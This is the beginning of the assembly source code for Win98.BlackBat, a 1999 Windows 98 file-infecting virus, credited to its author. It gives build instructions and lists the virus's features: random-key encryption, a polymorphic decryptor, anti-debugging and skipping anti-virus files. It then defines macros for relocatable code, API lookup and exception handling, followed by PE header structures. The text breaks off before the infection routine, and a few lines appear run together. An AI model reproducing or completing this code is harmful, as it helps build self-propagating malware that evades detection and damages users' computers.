;+----------------------------------------------------------------------------+
;| +------------------------------------------------------------------------+ |
;| | | |
;| | \|/ Win98.BlackBat \|/ | |
;| | (. .) ================ (. .) | |
;| | ( | ) ( | ) | |
;| | ( v ) (c) 1999, Rohitab Batra ( v ) | |
;| | __| |__ < This e-mail address is being protected from spambots. You need JavaScript enabled to view it > __| |__ | |
;| | // \\ ICQ: 11153794 // \\ | |
;| | // ^ ^ \\ | |
;| | ((====> http://www.rohitab.com <=====)) | |
;| | | |
;| |"Blessed is he who expects nothing, for he shall not be disappointed" | |
;| | | |
;| +------------------------------------------------------------------------+ |
;+----------------------------------------------------------------------------+
;
;
;Linking (Turbo Linker)
; c:\>tlink32 /x /Tpe /aa /c BlackBat,BlackBat,,IMPORT32.LIB
;
;Making Code Section Writable (EditBin from SDK, or any other utility)
; c:\>editbin /SECTION:CODE,w BlackBat.EXE
;
;***** Info About the Virus *****
;* If WIN.SYS is found in the root directory, the virus does not infect any file,
; and does not become resident.
;* File time and attributes are restored after infection
;* Encrypted with a random key
;* Doesn't infect anti-virus files, NAV, TBAV, SCAN, CLEAN, F-PROT
;* Anti-Debugging Code
;* Structured Exception Handling
;* Decryption engine is Polymorphic
;
;***** TODO *****
;1. Dont infect files with todays date
;2. Draw Random Bats on the Screen (Use CreateCompatibleBitmap & Get/Set Pixel)
;3. Doesn't infect files in directories with long file names
.386p
.model flat ,stdcall
EXTRN ExitProcess:PROC ;Any Imported Fn, so that the first
;generation copy executes without crashing
.data
DB ? ;Required for TASM, Else will Crash !!??
;+----------------------------------------------------------------------------+
;| +------------------------------------------------------------------------+ |
;| | | |
;| | @MESSAGE_BOX Macro
| |
;| | | |
;| +------------------------------------------------------------------------+ |
;+----------------------------------------------------------------------------+
; Description
; -> Displays a MessageBox with the given Message. Note the caption of
; the MessageBox is the same as the Message
;
; Arguments
; -> szMessage: Message to be displayed
;
; Return Value:
; -> None
;
; Registers Destroyed
; -> ALL
;___________________________
@MESSAGE_BOX MACRO szMessage
IF DEBUG
@DELTA esi
mov eax, esi
add eax, offset szMessage
call esi + MessageBoxA, 0, eax, eax, MB_OK OR MB_ICONINFORMATION.ENDIF
ENDM
;+----------------------------------------------------------------------------+
;| +------------------------------------------------------------------------+ |
;| | | |
;| | @DEFINE_API Macro | |
;| | | |
;| +------------------------------------------------------------------------+ |
;+----------------------------------------------------------------------------+
; Description
; -> Defines an API that will be called by the Virus. The macro is expanded
; to the following, if APIName is MessageBoxA:
; szMessageBoxA DB "MessageBoxA", 0
; MessageBoxA DD ?
;
; Arguments
; -> APIName: API to be defined. MUST BE EXACTLY the same as exported by
; the DLL. e.g. MessageBoxA
;
; Return Value:
; -> None
;
; Registers Destroyed
; -> None
;
;________________________
@DEFINE_API MACRO APIName
sz&APIName DB "&APIName", 0 ;;ASCIIZ Name of API
&APIName DD ? ;;Storage space for API Address
ENDM
;+----------------------------------------------------------------------------+
;| +------------------------------------------------------------------------+ |
;| | | |
;| | @DELTA Macro | |
;| | | |
;| +------------------------------------------------------------------------+ |
;+----------------------------------------------------------------------------+
; Description
; -> Returns the delta offset in the specified register
;
; Arguments
; -> Register: register in which the value of the delta offset is copied
;
; Return Value:
; -> Register: Delta Offset
;
; Registers Destroyed
; -> Register
;
;____________________
@DELTA MACRO Register
LOCAL GetIP
call GetIP ;;This will push EIP on the stack
GetIP:
pop Register ;;get EIP of current instruction
sub Register, offset GetIP ;;Delta Offset
ENDM
;+----------------------------------------------------------------------------+
;| +------------------------------------------------------------------------+ |
;| | | |
;| | @OFFSET Macro | |
;| | | |
;| +------------------------------------------------------------------------+ |
;+----------------------------------------------------------------------------+
; Description
; -> Returns the true offset of the specified address. Unlike the offset
; keyword, which calculates the address at assembly time, this macro
; calculates the address at run-time. This is used to get the correct
; offset when the virus has been relocated. Instead of using instructions
; like "mov esi, offset szFilename", use "@OFFSET esi, szFilename"
;
; Arguments
; -> Register: register in which the offset is to be returned
; -> Expression: expression whose offset is required
;
; Return Value:
; -> Register: Correct offset of Expression
;
; Registers Destroyed.; -> Register
;
;_________________________________
@OFFSET MACRO Register, Expression
LOCAL GetIP
call GetIP ;;This will push EIP on the stack
GetIP:
pop Register ;;get EIP of current instruction
add Register, offset Expression - offset GetIP ;;True offset
ENDM
;+----------------------------------------------------------------------------+
;| +------------------------------------------------------------------------+ |
;| | | |
;| | @GET_API_ADDRESS Macro | |
;| | | |
;| +------------------------------------------------------------------------+ |
;+----------------------------------------------------------------------------+
; Description
; -> Gets the address of the API, and stores it
;
; Arguments
; -> APIName: API whose address is required
; -> ESI: Delta Offset
; -> EBX: Address of GetProcAddress(...)
; -> ECX: Base address of DLL which exports the API
;
; Return Value:
; -> None
;
; Registers Destroyed
; -> All Except ESI, EBX and ECX
;
;_____________________________
@GET_API_ADDRESS MACRO APIName
push ebx ;;Save Addr of GetProcAddress(...)
push ecx ;;Save Image Base
mov eax, esi
add eax, offset sz&APIName ;;API whose address is required
call ebx, ecx, eax ;;GetProcAddress(...)
pop ecx ;;Restore Image Base
pop ebx ;;Restore Addr of GetProcAddress(...)
mov [esi + APIName], eax ;;Save API Address
ENDM
;+----------------------------------------------------------------------------+
;| +------------------------------------------------------------------------+ |
;| | | |
;| | @TRY_BEGIN, @TRY_EXCEPT and @TRY_END Exception Handling Macros | |
;| | | |
;| +------------------------------------------------------------------------+ |
;+----------------------------------------------------------------------------+
; Description
; -> @TRY_BEGIN: This macro is used to install the exception handler. The
; code that follows this is the one that is checked for
; exceptions
; @TRY_EXCEPT: The code that follows this is executed if an exception
; occurs.
; @TRY_END: This is used to mark the end of the TRY block
;
; Example
; @TRY_BEGIN ZeroMemory
; <CODE1: Code to check for exceptions goes here>
; @TRY_CATCH ZeroMemory
; <CODE2: Gets executed if an exception occurs in CODE1>
; @TRY_END ZeroMemory
;
; Arguments
; -> Handler: Name of the exception handler. MUST BE UNIQUE throughout the
; program
;
; Return Value:
; -> None
;
; Registers Destroyed
; -> If an exception occurs, all registers are restored to the state before
; the @TRY_BEGIN block, otherwise, no registers are modified
;_______________________.@TRY_BEGIN MACRO Handler
pushad ;;Save Current State
@OFFSET esi, Handler ;;Address of New Exception Handler
push esi
push dword ptr fs:[0] ;;Save Old Exception Handler
mov dword ptr fs:[0], esp ;;Install New Handler
ENDM
@TRY_EXCEPT MACRO Handler
jmp NoException&Handler ;;No Exception Occured, so jump over
Handler:
mov esp, [esp + 8] ;;Exception Occured, Get old ESP
pop dword ptr fs:[0] ;;Restore Old Exception Handler
add esp, 4 ;;ESP value before SEH was set
popad ;;Restore Old State
ENDM
@TRY_END MACRO Handler
jmp ExceptionHandled&Handler ;;Exception was handled by @TRY_EXCEPT
NoException&Handler: ;;No Exception Occured
pop dword ptr fs:[0] ;;Restore Old Exception Handler
add esp, 32 + 4 ;;ESP value before SEH was set. 32 for pushad and ...
;;...4 for push offset Handler. (No Restore State)
ExceptionHandled&Handler: ;;Exception has been handled, or no exception occured
ENDM
;+----------------------------------------------------------------------------+
;| +------------------------------------------------------------------------+ |
;| | | |
;| | @CALL_INT21h Macro | |
;| | | |
;| +------------------------------------------------------------------------+ |
;+----------------------------------------------------------------------------+
; Description
; -> Makes an INT 21h Call in Protected Mode
;
; Arguments
; -> Service: INT 21h Service Number
;
; Return Value:
; -> None
;
; Registers Destroyed
; -> Depends on Service called
;_________________________
@CALL_INT21h MACRO Service
mov eax, Service ;;INT 21h Service
@DELTA esi
call esi + VxDCall, VWIN32_Int21Dispatch, eax, ecx
ENDM
;+----------------------------------------------------------------------------+
;| +------------------------------------------------------------------------+ |
;| | | |
;| | Constants | |
;| | | |
;| +------------------------------------------------------------------------+ |
;+----------------------------------------------------------------------------+
;Win32 Constants
PAGE_READWRITE EQU 00000004h
IMAGE_READ_WRITE_EXECUTE EQU 0E0000000h
IMAGE_SCN_MEM_SHARED EQU 10000000h ;Section is Sharable
IMAGE_FILE_DLL EQU 2000h ;File is a DLL
FILE_MAP_ALL_ACCESS EQU 000F001Fh
IMAGE_SIZEOF_NT_SIGNATURE EQU 04h ;PE00 = 0x00004550, 4 bytes
NULL EQU 0
TRUE EQU 1
FALSE EQU 0
;File Access
GENERIC_READ EQU 80000000h ;Access Mode Read Only
GENERIC_WRITE EQU 40000000h ;Access Mode Write Only
FILE_SHARE_READ EQU 00000001h ;Open Share, Deny Write
FILE_SHARE_WRITE EQU 00000002h ;Open Share, Deny Read
INVALID_HANDLE_VALUE EQU -1
ERROR_ALREADY_EXISTS EQU 000000B7h
FILE_ATTRIBUTE_NORMAL EQU 00000080h
OPEN_EXISTING EQU 3 ;Fail if not found
;Shutdown Options
EWX_FORCE EQU 4.EWX_SHUTDOWN EQU 1
;MessageBox
MB_OK EQU 00000000h
MB_YESNO EQU 00000004h
MB_ICONINFORMATION EQU 00000040h
;Virus_Constants
@BREAK EQU int 3
;MAX_RUN_TIME EQU 5*60*60*1000 ;Time we allow windows to run, 5hrs
VIRUS_SIGNATURE EQU 08121975h ;My B'day, 8 Dec 1975
RESIDENCY_CHECK_SERVICE EQU 0AD75h ;Used to check if Virus is resident
RESIDENCY_SUCCESS EQU 0812h ;Value returned if Virus is resident
;VxD Stuff
VWIN32_Int21Dispatch EQU 002A0010h
LFN_OPEN_FILE_EXTENDED EQU 716Ch
PC_WRITEABLE EQU 00020000h
PC_USER EQU 00040000h
PR_SHARED EQU 80060000h
PC_PRESENT EQU 80000000h
PC_FIXED EQU 00000008h
PD_ZEROINIT EQU 00000001h
SHARED_MEMORY EQU 80000000h ;Anything above this is shared
PageReserve EQU 00010000h
PageCommit EQU 00010001h
PAGE_SIZE EQU 4096 ;Size of a Page in Win9x
;+----------------------------------------------------------------------------+
;| +------------------------------------------------------------------------+ |
;| | | |
;| | Structures | |
;| | | |
;| +------------------------------------------------------------------------+ |
;+----------------------------------------------------------------------------+
FILETIME STRUC
FT_dwLowDateTime DD ?
FT_dwHighDateTime DD ?
FILETIME ENDS
IMAGE_DOS_HEADER STRUC ;DOS .EXE header
IDH_e_magic DW ? ;Magic number
IDH_e_cblp DW ? ;Bytes on last page of file
IDH_e_cp DW ? ;Pages in file
IDH_e_crlc DW ? ;Relocations
IDH_e_cparhdr DW ? ;Size of header in paragraphs
IDH_e_minalloc DW ? ;Minimum extra paragraphs needed
IDH_e_maxalloc DW ? ;Maximum extra paragraphs needed
IDH_e_ss DW ? ;Initial (relative) SS value
IDH_e_sp DW ? ;Initial SP value
IDH_e_csum DW ? ;Checksum
IDH_e_ip DW ? ;Initial IP value
IDH_e_cs DW ? ;Initial (relative) CS value
IDH_e_lfarlc DW ? ;File address of relocation table
IDH_e_ovno DW ? ;Overlay number
IDH_e_res DW 4 DUP (?) ;Reserved words
IDH_e_oemid DW ? ;OEM identifier (for IDH_e_oeminfo)
IDH_e_oeminfo DW ? ;OEM information; IDH_e_oemid specific
IDH_e_res2 DW 10 DUP (?) ;Reserved words
IDH_e_lfanew DD ? ;File address of new exe header
IMAGE_DOS_HEADER ENDS
IMAGE_FILE_HEADER STRUC
IFH_Machine DW ? ;System that the binary is intended to run on
IFH_NumberOfSections DW ? ;Number of sections that follow headers
IFH_TimeDateStamp DD ? ;Time/Date the file was created on
IFH_PointerToSymbolTable DD ? ;Used for debugging information
IFH_NumberOfSymbols DD ? ;Used for debugging information
IFH_SizeOfOptionalHeader DW ? ;sizof(IMAGE_OPTIONAL_HEADER)
IFH_Characteristics DW ? ;Flags used mostly for libraries
IMAGE_FILE_HEADER ENDS
IMAGE_DATA_DIRECTORY STRUC
IDD_VirtualAddress DD ?
IDD_Size DD ?
IMAGE_DATA_DIRECTORY ENDS
IMAGE_OPTIONAL_HEADER STRUC
;Standard Fields
IOH_Magic DW ? ;Mostly 0x010B.IOH_MajorLinkerVersion DB ? ;Version of the linker used
IOH_MinorLinkerVersion DB ? ;Version of the linker used
IOH_SizeOfCode DD ? ;Size of executable code
IOH_SizeOfInitializedData DD ? ;Size of Data Segment
IOH_SizeOfUninitializedData DD ? ;Size of bss Segment
IOH_AddressOfEntryPoint DD ? ;RVA of code entry point
IOH_BaseOfCode DD ? ;Offset to executable code
IOH_BaseOfData DD ? ;Offset to initialized data
;NT Additional Fields
IOH_ImageBase DD ? ;Preferred load address
IOH_SectionAlignment DD ? ;Alignment of Sections in RAM
IOH_FileAlignment DD ? ;Alignment of Sections in File
IOH_MajorOperatingSystemVersion DW ? ;OS Version required to run this image
IOH_MinorOperatingSystemVersion DW ? ;OS Version required to run this image
IOH_MajorImageVersion DW ? ;User specified version number
IOH_MinorImageVersion DW ? ;User specified version number
IOH_MajorSubsystemVersion DW ? ;Expected Subsystem version
IOH_MinorSubsystemVersion DW ? ;Expected Subsystem version
IOH_Win32VersionValue DD ? ;Mostly set to 0
IOH_SizeOfImage DD ? ;Amount of memory the image will need
IOH_SizeOfHeaders DD ? ;Size of DOS hdr, PE hdr and Object table
IOH_CheckSum DD ? ;Checksum (Used by NT to check drivers)
IOH_Subsystem DW ? ;Subsystem required to run this image
IOH_DllCharacteristics DW ? ;To decide when to call DLL's entry point
IOH_SizeOfStackReserve DD ? ;Size of Reserved Stack
IOH_SizeOfStackCommit DD ? ;Size of initially commited stack
IOH_SizeOfHeapReserve DD ? ;Size of local heap to reserve
IOH_SizeOfHeapCommit DD ? ;Amount to commit in local heap
IOH_LoaderFlags DD ? ;Not generally used
IOH_NumberOfRvaAndSizes DD ? ;Number of valid entries in DataDirectory
IOH_DataDirectory IMAGE_DATA_DIRECTORY 16 DUP (?)
IMAGE_OPTIONAL_HEADER ENDS
IMAGE_EXPORT_DIRECTORY STRUC
IED_Characteristics DD ? ;Currently set to 0
IED_TimeDateStamp DD ? ;Time/Date the export data was created
IED_MajorVersion DW ? ;User settable
IED_MinorVersion DW ?
IED_Name DD ? ;RVA of DLL ASCIIZ name
IED_Base DD ? ;First valid exported ordinal
IED_NumberOfFu
